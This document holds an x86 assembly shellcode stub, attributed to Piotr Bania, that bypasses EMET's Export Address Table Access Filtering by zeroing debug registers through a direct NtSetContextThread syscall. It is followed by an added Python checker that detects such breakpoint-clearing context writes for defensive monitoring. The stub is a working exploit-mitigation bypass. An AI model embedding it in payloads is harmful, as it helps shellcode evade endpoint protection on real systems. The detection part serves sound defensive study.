; BYPASSING EMET Export Address Table Access Filtering feature
; ------------------------------------------------------------------
; just a simple stub for shellcode that erases debug registers
; therefore no more emet breakpoints (no EAF anymore)
; if you want to use it on other systems (than XP) just change the
; NtSetContextThread_XP syscall value.
; ------------------------------------------------------------------
;
; and just for your information what is EAF (from the help file):
;
; In order to do something "useful", shellcode generally needs to call
; Windows APIs. However, in order to call an API, shellcode must first
; find the address where that API has been loaded. To do this the vast
; majority of shellcode iterates through the export address table of all
; loaded modules, looking for modules that contain useful APIs. Typically
; this involves kernel32.dll or ntdll.dll. Once an interesting module has
; been found, the shellcode can then figure out the address where an API
; in that module resides. This mitigation filters accesses to the Export
; Address Table (EAT), allowing or disallowing the read/write access based
; on the calling code. With EMET in place, most of today's shellcode will
; be blocked when it tries to look up the APIs needed for its payload.
;
; - Piotr Bania / www.piotrbania.com

CONTEXT_SIZE            equ 0000002cch
CURRENT_THREAD          equ 0FFFFFFFEh
NtSetContextThread_XP   equ 0000000D5h
; CONTEXT_DEBUG_REGISTERS is the winnt.h constant; it is not defined in this listing

        mov     ebx, esp
        sub     esp, CONTEXT_SIZE
        mov     dword ptr [esp], CONTEXT_DEBUG_REGISTERS

        ; well zeroing entire struct is not necessary but who cares.
        mov     edi, esp
        mov     ecx, CONTEXT_SIZE
        add     edi, 4
        sub     ecx, 4
        xor     eax, eax
        rep     stosb

        push    esp                     ; context
        push    CURRENT_THREAD
        call    get_delta
get_delta:
        pop     edx
        lea     eax, [edx + (offset my_ret - offset get_delta)]
        push    eax
        push    eax
        mov     edx, esp
        mov     eax, NtSetContextThread_XP
        db      0Fh, 034h               ; sysenter
my_ret:
        mov     esp, ebx

; *** you are now free, no debug breakpoints ***
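The stub above defeats EAF by handing NtSetContextThread a CONTEXT whose ContextFlags select the debug registers and whose DR0-DR7 are all zero, which disables every hardware breakpoint EMET placed on the export tables. From the monitoring side that is the observable: a thread-context write that carries CONTEXT_DEBUG_REGISTERS and leaves DR7 with no enable bits set. The checker below is an added example, not part of Piotr Bania's listing; it assumes the 32-bit winnt.h CONTEXT layout (ContextFlags, Dr0..Dr3, Dr6, Dr7 as the first seven DWORDs, total size 0x2CC) and the winnt.h values CONTEXT_i386 = 0x10000 and CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10. All sample buffers are constructed inline, not captured. A hook or sandbox syscall monitor sitting in front of NtSetContextThread could run this over the buffer it receives and raise an alert rather than let the write through.

```python
"""Flag a CONTEXT write that would clear all hardware breakpoints.

Added example (not from the original stub). Layout and constants are taken
from the 32-bit winnt.h CONTEXT definition; the sample buffers are
constructed here for illustration.
"""
import struct

CONTEXT_i386 = 0x00010000                      # winnt.h
CONTEXT_CONTROL = CONTEXT_i386 | 0x01          # winnt.h: SS:SP, CS:IP, FLAGS, BP
CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10  # winnt.h: DR0-DR3, DR6, DR7
CONTEXT_SIZE = 0x2CC                           # sizeof(CONTEXT) on x86, matches the stub

# The x86 CONTEXT begins with seven little-endian DWORDs:
#   ContextFlags, Dr0, Dr1, Dr2, Dr3, Dr6, Dr7
_HEADER = struct.Struct("<7I")
_FIELDS = ("ContextFlags", "Dr0", "Dr1", "Dr2", "Dr3", "Dr6", "Dr7")


def parse_debug_regs(ctx: bytes) -> dict:
    """Return the ContextFlags and debug-register fields of a CONTEXT buffer."""
    if len(ctx) < _HEADER.size:
        raise ValueError("buffer shorter than the CONTEXT header")
    return dict(zip(_FIELDS, _HEADER.unpack_from(ctx, 0)))


def clears_hw_breakpoints(ctx: bytes) -> bool:
    """True if applying this CONTEXT would disable every hardware breakpoint.

    Only writes that actually select the debug registers matter; a write with
    other flags leaves DR0-DR7 untouched regardless of the buffer contents.
    DR7 bits 0..7 are the L0/G0 .. L3/G3 enable bits, so a zero low byte means
    no breakpoint remains armed. A debugger removing its own last breakpoint
    produces the same pattern, so a monitor should correlate with who is
    calling; this function only classifies the buffer.
    """
    regs = parse_debug_regs(ctx)
    if (regs["ContextFlags"] & CONTEXT_DEBUG_REGISTERS) != CONTEXT_DEBUG_REGISTERS:
        return False
    return (regs["Dr7"] & 0xFF) == 0


def build_context(flags: int, dr0=0, dr1=0, dr2=0, dr3=0, dr6=0, dr7=0) -> bytes:
    """Construct a full-size CONTEXT buffer with the given header fields (test helper)."""
    head = _HEADER.pack(flags, dr0, dr1, dr2, dr3, dr6, dr7)
    return head + b"\x00" * (CONTEXT_SIZE - len(head))


# Constructed samples:
#   ZEROED  - what the stub builds: debug-register flag set, everything else zero
#   ARMED   - a legitimate debug-register write that keeps one breakpoint enabled
#   NO_DR   - a CONTEXT_CONTROL write; DR fields are ignored by the kernel
ZEROED = build_context(CONTEXT_DEBUG_REGISTERS)
ARMED = build_context(CONTEXT_DEBUG_REGISTERS, dr0=0x7C800000, dr7=0x00000001)
NO_DR = build_context(CONTEXT_CONTROL)

if __name__ == "__main__":
    for name, buf in (("ZEROED", ZEROED), ("ARMED", ARMED), ("NO_DR", NO_DR)):
        print(name, "clears all HW breakpoints:", clears_hw_breakpoints(buf))
```

The check is deliberately narrow: it reports only on the buffer, not on the caller. In a real monitor the alert condition would be "non-debugger code on a thread that EMET instrumented submitted a CONTEXT that `clears_hw_breakpoints` accepts", with the caller identity supplied by the hook.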